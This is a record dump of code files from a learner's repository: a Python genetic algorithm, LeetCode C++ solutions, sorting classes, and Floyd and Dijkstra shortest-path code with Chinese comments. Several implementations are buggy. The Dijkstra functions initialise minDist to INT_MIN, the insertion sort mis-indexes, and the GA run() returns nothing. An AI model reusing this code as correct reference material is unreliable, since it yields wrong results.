self.Optimal[1]:\r\n self.Optimal = [M[np.argmax(fitness)], np.max(fitness)]\r\n fitness[np.argmin(fitness)] = self.Optimal[1]\r\n M[np.argmin(fitness)] = M[np.argmax(fitness)]\r\n return fitness, M\r\n\r\n # 算术交叉\r\n def cross(self, M):\r\n s = []\r\n for i in range(self.M_Size // 2):\r\n if np.random.random() < self.Pc:\r\n x1 = np.random.randint(0, self.M_Size)\r\n while x1 in s:\r\n x1 = np.random.randint(0, self.M_Size)\r\n x2 = np.random.randint(0, self.M_Size)\r\n while x2 in s:\r\n x2 = np.random.randint(0, self.M_Size)\r\n s.append(x2)\r\n a, b = M[x1], M[x2]\r\n alpha = np.random.uniform(0, 0.05)\r\n M[x1] = sorted([np.random.choice([-1, 1]) * alpha * b + (1 - alpha) * a, 0, 1])[1]\r\n M[x2] = sorted([np.random.choice([-1, 1]) * alpha * a + (1 - alpha) * b, 0, 1])[1]\r\n return M\r\n\r\n # 变异\r\n def mutation(self, M, t):\r\n if t < 0.8 * self.T:\r\n for i in range(self.M_Size):\r\n if 
np.random.random() < self.Pm:\r\n M[i] = np.random.uniform(self.bound_min, self.bound_max)\r\n else:\r\n for i in range(self.M_Size):\r\n if np.random.random() < self.Pm:\r\n M[i] = sorted([M[i] + np.random.choice([-1, 1]) * random.gauss(\r\n (self.bound_min + self.bound_max) / 2, 2 * (self.bound_max - self.bound_min) / self.M_Size), 0,\r\n 1])[1]\r\n return M\r\n\r\n def run(self):\r\n M = self.initM()\r\n t = 1\r\n while t <= self.T:\r\n fitness = self.fitness(M)\r\n fitness, M = self.select(fitness, M)\r\n M = self.cross(M)\r\n M = self.mutation(M, t)\r\n t += 1\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ga = GA_extremum(M_Size=40, T=50, Pm=0.05, Pc=0.5, bound_min=0, bound_max=1)\r\n res = ga.run()\r\n print(\"最优解为:x={}\\n极值:{}\".format(res[0], res[1]))\r\n" }, { "alpha_fraction": 0.45602163672447205, "alphanum_fraction": 0.4736129939556122, "avg_line_length": 23.55172348022461, "blob_id": "54f041c7f468f99414aaa5a1c4fe8295535618db", "content_id": "671e15e246ba1ae3d09a47195927c62682ac94b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 755, "license_type": "no_license", "max_line_length": 70, "num_lines": 29, "path": "/leetcode/leetcode973.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 973.最接近原点的K个点\r\n\r\nclass Solution {\r\npublic:\r\n struct elem\r\n {\r\n vector<int> point;\r\n int dist;\r\n friend bool operator < (elem e1, elem e2) {\r\n return e1.dist >= e2.dist;\r\n }\r\n };\r\n vector<vector<int>> kClosest(vector<vector<int>>& points, int k) {\r\n priority_queue<elem> pq;\r\n vector<vector<int>>res;\r\n for(int i = 0; i < points.size(); i++){\r\n int temp = pow(points[i][0],2) + pow(points[i][1],2);\r\n pq.push({points[i],temp});\r\n }\r\n for(int i = 0; i < k; i++){\r\n res.push_back(pq.top().point);\r\n pq.pop();\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.363778293132782, "alphanum_fraction": 0.37548789381980896, "avg_line_length": 28.452381134033203, "blob_id": "318718580cc626ff3539f25e1a7d982ba73c8482", "content_id": "07b19fcff3d54c10266b2f10f10b88707d59d2ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1345, "license_type": "no_license", "max_line_length": 72, "num_lines": 42, "path": "/leetcode/leetcode15.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 15.三数之和\r\n\r\nclass Solution {\r\npublic:\r\n vector<vector<int>> threeSum(vector<int>& nums) {\r\n vector<vector<int>> res;\r\n // 特判\r\n if(nums.size()<3) return res;\r\n sort(nums.begin(), nums.end());\r\n int i = 0;\r\n // 只要搜索到数组的倒数第三个就可以了,之后凑不齐3个数了\r\n while (i < nums.size()-2)\r\n {\r\n if(nums[i] > 0) return res;\r\n int left = i+1, right = nums.size()-1;\r\n while (left < right)\r\n {\r\n if(nums[i]+nums[left]+nums[right] == 0){\r\n res.push_back({nums[i],nums[left],nums[right]});\r\n while(left < right && nums[left] == nums[left+1]){\r\n left++;\r\n }\r\n while(left < right && nums[right] == nums[right-1]){\r\n right--;\r\n }\r\n left++;\r\n right--;\r\n } else if(nums[i]+nums[left]+nums[right] < 0){\r\n left++;\r\n } else right--;\r\n }\r\n while(i < nums.size()-2 && nums[i] == nums[i+1]){\r\n i++;\r\n }\r\n i++;\r\n }\r\n return res;\r\n }\r\n};\r\n\r\n" }, { "alpha_fraction": 0.38492199778556824, "alphanum_fraction": 0.3903883397579193, "avg_line_length": 26.3258056640625, "blob_id": 
"d6816a28c1b9602b686b1998e2aa0754c85615d8", "content_id": "9274e8eebd9d10310b5a166179777ebf12ed5d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10223, "license_type": "no_license", "max_line_length": 101, "num_lines": 310, "path": "/C/sorted.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<stdlib.h>\r\n#include<limits.h>\r\n#include<stdio.h>\r\n#include<vector>\r\n#include<algorithm>\r\nusing namespace std;\r\n\r\n\r\nstruct LinkNode\r\n {\r\n int key;\r\n LinkNode *next;\r\n LinkNode(int x) : key(x), next(NULL) {}\r\n }; \r\n\r\n\r\nclass sort_Insert //直接插入排序\r\n{ \r\npublic:\r\n\r\n /* 一、数组排序 */\r\n // 基本思想:从有序界开始与当前数字进行比较,如果比当前数字大,有序界数字向后移动\r\n void sort_InsertArray(int array[],int n) { \r\n int i , p;\r\n for (p = 1; p < n; p++) //排序界从1开始\r\n {\r\n int temp = array[p];\r\n for (i = p-1; i>0 && array[i]>temp ; i--)\r\n {\r\n array[i] = array[i-1]; //将比待排序数字大的数字都向后移一位\r\n }\r\n array[i] = temp;\r\n }\r\n }\r\n\r\n /*二、链表排序*/\r\n LinkNode* sort_InsertLink(LinkNode* head){\r\n if(head==NULL || head->next==NULL) return head;\r\n\r\n //定义伪头结点Tower\r\n LinkNode* Tower = new LinkNode(INT_MIN);\r\n Tower->next = head;\r\n\r\n //pre指向上一次移动的结点、end指向有序边界结点、now指向正在排序的结点\r\n LinkNode *pre=Tower, *end=Tower, *now=head;\r\n while (now)\r\n {\r\n if (now->key > end->key) //这种情况不变化\r\n {\r\n end = end->next;\r\n now = now->next;\r\n }\r\n else\r\n {\r\n if (now->key < pre->key) //正在排序的数比上次排序的数小,说明要进行移动,将pre置于头结点\r\n {\r\n pre = Tower;\r\n }\r\n while (pre->next && pre->next->key < now->key) //找到要操作的结点\r\n {\r\n pre = pre->next;\r\n }\r\n LinkNode* temp = now->next; //先保留下一个要操作的结点位置\r\n now->next = pre->next; //将正在排序的数与其后面的结点相连\r\n pre->next = now; //pre为上次移动的结点,因此置于正在操作的结点处\r\n end->next = temp; //有序界向后移动\r\n now = end->next; //更新正在操作的结点\r\n } \r\n }\r\n LinkNode* res = Tower->next;\r\n delete Tower;\r\n return res;\r\n }\r\n\r\n LinkNode* sort_InsertComplex(LinkNode* head){\r\n if (head==NULL || head->next==NULL) return head;\r\n LinkNode *Tower = new LinkNode(INT_MIN); // Tower是伪头结点,指向头结点\r\n Tower->next = head;\r\n LinkNode *p = Tower, *end = Tower, *cur = head; // p用于从头搜索数值,end用于确定已有序的区间,cur为正在排序的结点\r\n while (cur)\r\n {\r\n if (cur->key > end->key) // 这种情况顺序是合理的\r\n {\r\n end = end->next;\r\n cur = cur->next;\r\n }\r\n else \r\n {\r\n p = Tower; // 先将用于搜索的指针置于伪头\r\n while (p->next && p->next->key < cur->key)\r\n {\r\n p = p->next; // 找到要移动的结点\r\n } \r\n LinkNode *temp = cur->next; //正在排序部分的局部顺序应该是 head-->...->cur->p->...->end->temp->...\r\n cur->next = p->next; \r\n p->next = cur;\r\n end->next = temp;\r\n cur = end->next; \r\n } \r\n }\r\n return Tower->next; // 返回头结点\r\n }\r\n\r\n LinkNode* creatLink(){\r\n LinkNode *head = new LinkNode(INT_MIN);\r\n LinkNode *pre = new LinkNode(INT_MIN);\r\n pre = head;\r\n for (int i = 8; i >= 0; i--)\r\n {\r\n LinkNode *p = new LinkNode(0);\r\n p->key = i;\r\n pre->next = p;\r\n pre = p;\r\n }\r\n return head;\r\n }\r\n \r\n void print(LinkNode *head){\r\n while (head->next)\r\n {\r\n printf(\"%d \",head->next->key);\r\n head = head->next;\r\n }\r\n }\r\n};\r\n\r\nclass sort_Bubble //冒泡排序\r\n{\r\npublic:\r\n /*一、数组排序*/\r\n void sort_BubbleArray(int array[],int n){\r\n bool flag; // 指示是否发生元素移动,如果没发生,说明已经有序,终止排序\r\n for (int i = n-1; i >= 0; i--) //由于每轮排序将最大的数排至末尾,因此要指定末尾的位置\r\n {\r\n flag = false;\r\n for (int j = 0; j < i; j++)\r\n {\r\n if (array[j]>array[j+1])\r\n {\r\n int temp = array[j];\r\n array[j] = array[j+1];\r\n array[j+1] = temp;\r\n flag = true;\r\n } \r\n 
}\r\n if(!flag) break; \r\n } \r\n }\r\n\r\n /*二、链表排序*/\r\n LinkNode* sort_BubbleLink(LinkNode* head){\r\n LinkNode *pre, *cur, *tail;\r\n tail = NULL;\r\n while (head->next != tail) // 根据冒泡排序的特性,每次会将最大数排至最后,因此设置尾指针区分排序区\r\n {\r\n pre = head;\r\n cur = head->next; // cur表示正在排序的位置\r\n while (cur->next != tail) // 在有序区之前\r\n {\r\n if (cur->key > cur->next->key)\r\n {\r\n pre->next = cur->next;\r\n cur->next = pre->next->next;\r\n pre->next->next = cur;\r\n }\r\n else cur = cur->next;\r\n pre = pre->next; \r\n }\r\n tail = cur; // 每轮排序结束后更新界指针\r\n }\r\n return head; \r\n }\r\n};\r\n\r\nclass sort_Heap{ //堆排序\r\npublic:\r\n // 将以root为根的子树调整为大根堆\r\n void heap_Adjust(int array[],int root,int n){ \r\n int parent, child;\r\n int temp;\r\n temp = array[root]; // 每次比较是用传入的root节点的值与各个孩子节点进行比较\r\n for (parent = root; parent*2+1 < n; parent=child)\r\n {\r\n child = parent * 2 + 1;\r\n if (child!=n-1 && array[child]<array[child+1]) // 找出左右孩子的最大孩子\r\n child++;\r\n if (temp >= array[child]) break; //判断孩子值是否大于根值\r\n else\r\n {\r\n array[parent] = array[child];\r\n } \r\n }\r\n array[parent] = temp; // 最后剩下的空位就是parent的值应在的位置 \r\n }\r\n\r\n // 根据堆进行排序\r\n void sort_heap(int array[], int n){\r\n int i;\r\n for (i = n/2-1; i >= 0; i--) // 无序数组建堆\r\n {\r\n heap_Adjust(array,i,n);\r\n }\r\n for (i = n-1; i > 0; i--) // 弹出顶元素(排序过程)\r\n {\r\n int temp = array[0]; // 每次将待排序列最大值移至尾部,再重建堆,直到堆清空\r\n array[0] = array[i];\r\n array[i] = temp; \r\n heap_Adjust(array,0,i);\r\n } \r\n }\r\n};\r\n\r\nclass sort_Shell // 希尔排序\r\n{\r\npublic:\r\n void sort_shellArray(int array[],int n){\r\n int gap = n;\r\n int i, j, temp;\r\n for (gap>>=2; gap>0; gap>>=2){\r\n for (i = gap; i < n; i++)\r\n {\r\n j = 0;\r\n temp = array[i];\r\n for (j = i-gap; j>=0 && temp<array[j]; j = j-gap)\r\n {\r\n array[j + gap] = array[j];\r\n }\r\n array[j + gap] = temp;\r\n }\r\n }\r\n } \r\n};\r\n\r\nclass sort_Select // 直接选择排序\r\n{\r\npublic:\r\n void sort_SelectArray(int array[], int n){\r\n int index;\r\n int val;\r\n for (int i = 0; i < n-1; i++)\r\n {\r\n val = array[i];\r\n index = i;\r\n for (int j = i;j < n;j++)\r\n {\r\n if (array[j] < val)\r\n {\r\n index = j;\r\n val = array[j];\r\n }\r\n }\r\n int temp = array[i];\r\n array[i] = array[index];\r\n array[index] = temp;\r\n } \r\n }\r\n};\r\n\r\nclass sort_Quick{ // 快速排序\r\npublic:\r\n // 选定基准值\r\n int partition(int array[],int low,int high){\r\n int pivot = array[high]; // 取最后一个值作基准\r\n int i = low - 1; // i是小元素指针,j是大元素指针\r\n //j从数组头部开始,每发现一个比基准小的数,就将它换至i处\r\n //i每接受一个最小数,就+1,可以理解为开新格子放东西\r\n for (int j = low; j < high; j++)\r\n {\r\n if (array[j] <= pivot)\r\n {\r\n i++;\r\n int temp = array[i];\r\n array[i] = array[j];\r\n array[j] = temp;\r\n }\r\n }\r\n //在这里,i指向的是最靠近中部的比基准数小的值\r\n //i+1是第一个比基准数大的值,因此让其与基准交换,便可区分大小\r\n int temp = array[i+1];\r\n array[i+1] = array[high];\r\n array[high] = temp;\r\n return i+1; \r\n }\r\n // 快速排序 , 递归\r\n void sort_quick(int array[],int left,int right){\r\n if (left < right){\r\n int p = partition(array,left,right);\r\n sort_quick(array,left,p-1);\r\n sort_quick(array,p+1,right);\r\n } \r\n }\r\n};\r\n\r\nclass sort_Bucket{ // 桶排序\r\npublic:\r\n void sort_BucketArray(int array[],int n){\r\n vector<int> vec[n];\r\n for (int i = 0; i < n; i++){\r\n int bi = array[i];\r\n vec[bi].push_back(array[i]);\r\n }\r\n for (int i = 0; i < n; i++)\r\n sort(vec[i].begin(),vec[i].end());\r\n \r\n int index = 0;\r\n for (int i = 0; i < n; i++)\r\n for (int j = 0;j < vec[i].size(); j++)\r\n array[index++] = vec[i][j];\r\n }\r\n};\r\n" }, { "alpha_fraction": 
0.3597733676433563, "alphanum_fraction": 0.39376771450042725, "avg_line_length": 17.61111068725586, "blob_id": "1ee0dd284729a04b4ad926c8fec98aca6f34b856", "content_id": "e351c8975ae54edc97d1f75831cd4a11d577b67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 357, "license_type": "no_license", "max_line_length": 36, "num_lines": 18, "path": "/leetcode/leetcode263.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 263.丑数\r\n\r\nclass Solution {\r\npublic:\r\n bool isUgly(int n) {\r\n if(n <= 0) return false;\r\n int arr[3] = {2,3,5};\r\n for(int i = 0;i < 3;i++){\r\n while(n % arr[i] == 0) {\r\n n /= arr[i];\r\n }\r\n }\r\n return n == 1;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.3565604090690613, "alphanum_fraction": 0.36767977476119995, "avg_line_length": 21.59649085998535, "blob_id": "e252216e46a6114ad286216bf57ee3bf37bb6fda", "content_id": "06c4d4436e57aae375667a866ce2a8e6c3a6770d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1517, "license_type": "no_license", "max_line_length": 102, "num_lines": 57, "path": "/C/Floyd.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\n#include<algorithm>\r\nusing namespace std;\r\n\r\n/*\r\n原理:\r\n 如果有一个点 K ,使得 i-->K-->j 的距离小于 i-->j 的距离\r\n 则:用点 K作为点(i,j)的中介点\r\n\r\n伪代码:\r\n void Floyd() {\r\n 枚举顶点 K:\r\n 以 K作为中介点,枚举顶点 i,j:\r\n if (dist[i][k] + dist[k][j] < dist[i][j])\r\n {\r\n dist[i][j] = dist[i][k] + dist[k][j]\r\n }\r\n }\r\n*/\r\n\r\nconst int MAX = 200;\r\nint n, m;\r\nint dist[MAX][MAX]; // 默认为 INT_MAX\r\n\r\n// 算法\r\nvoid Floyd() {\r\n for (int k = 0; k < n; k++)\r\n for (int i = 0; i < n; i++)\r\n for (int j = 0; j < n; j++)\r\n if(dist[i][k] != INT_MAX && dist[k][j] != INT_MAX && dist[i][k]+dist[k][j]<dist[i][j])\r\n dist[i][j] = dist[i][k] + dist[k][j];\r\n}\r\n\r\nint main() {\r\n int x,y,w;\r\n fill(dist[0],dist[0]+MAX*MAX,INT_MAX);\r\n scanf(\"%d%d\",&n,&m); // 顶点数与边数\r\n for (int i = 0; i < n; i++){ \r\n // 点到自己的距离为 0\r\n dist[i][i] = 0;\r\n }\r\n for (int i = 0; i < m; i++)\r\n {\r\n // 输入边的权重与边的两顶点\r\n scanf(\"%d%d%d\",&x,&y,&w);\r\n dist[x][y] = w;\r\n }\r\n Floyd();\r\n for (int i = 0; i < n; i++){\r\n for (int j = 0; j < n; j++){\r\n if (dist[i][j] != INT_MAX)\r\n printf(\"%d--%d = %d\\n\",i,j,dist[i][j]);\r\n }\r\n // printf(\"\\n\");\r\n } \r\n return 0;\r\n}\r\n\r\n\r\n" }, { "alpha_fraction": 0.455798864364624, "alphanum_fraction": 0.4785076975822449, "avg_line_length": 26.674419403076172, "blob_id": "0478152d4d679012e510c1348f0ba7c427e3d1e9", "content_id": "ee2f011a2effab6277776e447650cab7a10552da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1247, "license_type": "no_license", "max_line_length": 63, "num_lines": 43, "path": "/leetcode/leetcode23.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 23.合并k个升序链表\r\n\r\nstruct ListNode {\r\n int val;\r\n ListNode *next;\r\n ListNode() : val(0), next(nullptr) {}\r\n ListNode(int x) : val(x), next(nullptr) {}\r\n ListNode(int x, ListNode *next) : val(x), next(next) {}\r\n};\r\n\r\nclass Solution {\r\npublic:\r\n ListNode* mergeKLists(vector<ListNode*>& lists) {\r\n ListNode *tower = nullptr;\r\n for(int i = 0; i < lists.size(); i++){\r\n tower = mergeTwoLists(tower,lists[i]);\r\n }\r\n return 
tower;\r\n }\r\n\r\n ListNode* mergeTwoLists(ListNode* l1, ListNode* l2) {\r\n if(l1 == nullptr && l2 != nullptr) return l2;\r\n else if(l1 != nullptr && l2 == nullptr) return l1;\r\n else if(l1 == nullptr && l2 == nullptr) return nullptr;\r\n ListNode *head = new ListNode(1);\r\n ListNode *ret = head;\r\n while (l1 != NULL && l2 != NULL){\r\n if (l1->val <= l2->val){\r\n ret->next = l1;\r\n l1 = l1->next;\r\n } else{\r\n ret->next = l2;\r\n l2 = l2->next;\r\n }\r\n ret = ret->next;\r\n }\r\n ret->next = l1 == NULL ? l2 : l1;\r\n return head->next;\r\n }\r\n};\r\n" }, { "alpha_fraction": 0.5370370149612427, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 17.81818199157715, "blob_id": "ae7353ca375c558d969154c2ba545c98a7f8cb8a", "content_id": "b37c54e78ff24b82b35aff1c9a03990cce201e95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 238, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/leetcode/leetcode_sword65.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 剑指offer-65. 不用加减乘除做加法\r\n\r\nclass Solution {\r\npublic:\r\n int add(int a, int b) {\r\n return b == 0 ? a : add(a^b, (unsigned int)(a&b) << 1);\r\n }\r\n};" }, { "alpha_fraction": 0.3787755072116852, "alphanum_fraction": 0.38938775658607483, "avg_line_length": 23.040817260742188, "blob_id": "7e830d55345b4839e0a83c7f6f0081f5dfe5a359", "content_id": "190352669cbd1c165fecd0540815af5bf418bbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1579, "license_type": "no_license", "max_line_length": 70, "num_lines": 49, "path": "/leetcode/leetcode880.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 880. 索引处的解码字符串\r\n\r\n/*\r\n思路:\r\n1.首先遍历整个字符串,记录最终字符串的长度:\r\n 若当前解析出的字符串长度 < K,继续解析;\r\n 若 > K,停止解析\r\n2. 当前字符串长度为 sum>K\r\n 从停止解析前最后遍历的字符 S[i] 开始回退:\r\n 若该字符c为数字,则 sum/c(因为说明总长度遇到这个数字后重复了c遍)\r\n 若 sum/c < K,说明第 K位在 sum/c ~ sum这段区间内,且结果字符存在于 sum/c这段字符串内;\r\n 则 K %= (sum/c) ,如果 K=0,则退出搜索,结果为 S[i]\r\n 若该字符c为字母,则 sum--\r\n i--\r\n 当前字符串长度 sum == K,退出搜索,结果为 S[i]\r\n3. 
\r\n\r\n*/\r\n\r\nclass Solution {\r\npublic:\r\n string decodeAtIndex(string S, int K) {\r\n string ans;\r\n int n = S.length();\r\n long sum = 0, i = 0; \r\n for (; i < n; i++) { \r\n if (isalpha(S[i])) sum++;\r\n else { sum *= (S[i] - '0'); }\r\n if (sum >= K) break;\r\n }\r\n for (; i >= 0; i--) {\r\n if (sum > K){\r\n if (isdigit(S[i])) {\r\n sum /= (S[i] - '0');\r\n if (K > sum){\r\n K %= sum;\r\n if (K == 0) break;\r\n }\r\n } else sum--;\r\n } else if (sum == K) break;\r\n }\r\n while (isdigit(S[i])) i--;\r\n ans += S[i];\r\n return ans;\r\n }\r\n};" }, { "alpha_fraction": 0.3832857012748718, "alphanum_fraction": 0.39500001072883606, "avg_line_length": 21.72881317138672, "blob_id": "cce2ef1bacd7d81b3ed5ddbc881795aa599591d1", "content_id": "9ba38ea2d309717fc3742a9b98dfb3d1d29299c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8664, "license_type": "no_license", "max_line_length": 108, "num_lines": 295, "path": "/C/dijkstra.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n#define MAX 500\r\n\r\n/* dijkstra 计算最短距离的伪代码\r\n\r\n#define MAX 500\r\nint Graph[MAX][MAX];\r\nint dist[MAX]; \r\nbool visit[MAX];\r\n\r\nvoid dijkstra(int start)\r\n{\r\n 初始化dist (1) \r\n for(循环n次) \r\n {\r\n u = dist[MAX]中最小且没被访问过的顶点 (2)\r\n visit[u] = true\r\n for(从u出发能到达的所有顶点k) (3)\r\n {\r\n if(k没被访问过 && 以u为中转点的start-->k的距离比dist[k]小) (4)\r\n {\r\n 更新dist[k] (5)\r\n }\r\n }\r\n }\r\n}\r\n*/\r\n\r\nint Graph[MAX][MAX];\r\nint dist[MAX];\r\nbool visit[MAX];\r\n\r\nvoid dijkstra_1(int start){ // dijkstra计算最短距离\r\n\r\n // (1). 初始化dist\r\n fill(dist,dist+MAX,INT_MAX); \r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记visit[u]为true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4). 遍历从u能到达的所有点并更新dist[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n // k没被访问过 && u与k之间是连通的 && “起点-->u-->k”的距离比现有的“起点-->k”更短\r\n if(!visit[k] && Graph[u][k]!=INT_MAX && dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n }\r\n }\r\n }\r\n}\r\n\r\n\r\n/* 修改: dijkstra 解最短路径\r\n\r\n需要增添一个 preNode[MAX],记录点k的前驱\r\n代码上只需要在第一部分伪代码的序号(5)后面增加一条:\r\n\r\n \"令k的前驱为u\" (6)\r\n\r\nvoid dijkstra(int start)\r\n{\r\n 初始化dist (1) \r\n for(循环n次) \r\n {\r\n u = dist[MAX]中最小且没被访问过的顶点 (2)\r\n visit[u] = true\r\n for(从u出发能到达的所有顶点k) (3)\r\n {\r\n if(k没被访问过 && 以u为中转点的start-->k的距离比dist[k]小) (4)\r\n {\r\n 更新dist[k] (5)\r\n 令k的前驱为u (6)\r\n }\r\n }\r\n }\r\n}\r\n\r\n但是preNode中得到的是每个顶点的直接前驱,想要得到完整的最短路径,需要用 DFS不断递归寻找前驱,直到到达 start\r\n\r\n*/\r\n\r\nint preNode[MAX];\r\n\r\nvoid dijkstra_2(int start)\r\n{\r\n // (1)初始化 dist[] 和 preNode[]\r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n for(int i = 0;i < MAX;i++) preNode[i] = i;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记visit[u]为true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4). 
遍历从u能到达的所有点并更新dist[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n // k没被访问过 && u与k之间是连通的 && “起点-->u-->k”的距离比现有的“起点-->k”更短\r\n if(!visit[k] && Graph[u][k]!=INT_MAX && dist[u] + Graph[u][k] < dist[k])\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n preNode[k] = u; // 更新前驱\r\n }\r\n } \r\n } \r\n}\r\n\r\n\r\n/* 附加条件:如果对每条边增加一个边权(额外开销),求在最短路径有多少条时要求路径上的花费之和最大/小\r\n\r\n新增一个开销矩阵 Cost[MAX][MAX]\r\n并对第一段伪代码的序号 (3)修改\r\n*/\r\n\r\nint C[MAX][MAX];\r\nint cost[MAX];\r\n\r\nvoid dijkstra_3(int start)\r\n{\r\n // (1)初始化 dist[] \r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在更新 dist[] 的同时,更新 cost[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k]) // 先找最短距离\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n cost[k] = cost[u] + C[u][k];\r\n } \r\n else if(dist[u] + Graph[u][k] == dist[k] && cost[u] + C[u][k] < cost[k]){ // 是最短距离,但开销更小/大\r\n cost[k] = cost[u] + C[u][k];\r\n }\r\n }\r\n }\r\n }\r\n}\r\n\r\n/* 附加条件:如果对每个点都增加点权,球最短路径有多条时,要求点权之和最大\r\n与上面的边权类似,依然对(3)修改,增加一个 W[MAX],每次在更新最短距离时更新 weight[]\r\n\r\n*/\r\n\r\nint W[MAX];\r\nint weight[MAX];\r\n\r\nvoid dijkstra_4(int start)\r\n{\r\n // (1)初始化 dist[] \r\n fill(dist,dist+MAX,INT_MAX);\r\n dist[start] = 0;\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n // (3). 如果找不到更小的dist[],说明不连通,如果找到,则标记 visit[u]为 true\r\n if(u == -1) return;\r\n visit[u] = true;\r\n\r\n // (4).在更新 dist[] 的同时,更新 cost[]\r\n for(int k = 0;k < MAX;k++)\r\n {\r\n if(!visit[k] && Graph[u][k] != INT_MAX)\r\n {\r\n if(dist[u] + Graph[u][k] < dist[k]) // 先找最短距离\r\n {\r\n dist[k] = dist[u] + Graph[u][k];\r\n weight[k] = weight[u] + W[k];\r\n } \r\n else if(dist[u] + Graph[u][k] == dist[k] && weight[u] + W[k] < weight[k]){ // 是最短距离,但开销更小/大\r\n weight[k] = weight[u] + W[k];\r\n }\r\n }\r\n } \r\n } \r\n}\r\n\r\n/* 附加: 当最短路径不止一条,求最短路径条数\r\n增加一个记录 start-->u 的最短路径条数的数组 roadNum[MAX]\r\n初始条件下,roadNum[start]=1,其它为0;\r\n每次更新最短距离时,令 roadNum[k]继承 roadNum[u];\r\n当最短距离相同,将 roadNum[u] 加到 roadNum[k]上\r\n\r\n修改的位置依旧是 (3)\r\n\r\n*/\r\n\r\nint roadNum[MAX];\r\n\r\nvoid dijkstra_5(int start)\r\n{\r\n // (1)初始化 dist[] ,roadNum[]\r\n fill(dist,dist+MAX,INT_MAX);\r\n fill(roadNum,roadNum+MAX,0);\r\n dist[start] = 0;\r\n roadNum[start] = 1;\r\n\r\n\r\n // (2).找到dist[]中最小且没被访问过的点\r\n for(int i = 0; i < MAX;i++)\r\n {\r\n int u = -1, minDist = INT_MIN;\r\n for(int j = 0;j < MAX;j++)\r\n {\r\n if(!visit[j] && dist[j]<minDist)\r\n {\r\n u = j;\r\n minDist = dist[j];\r\n }\r\n }\r\n \r\n\r\n // (3). 
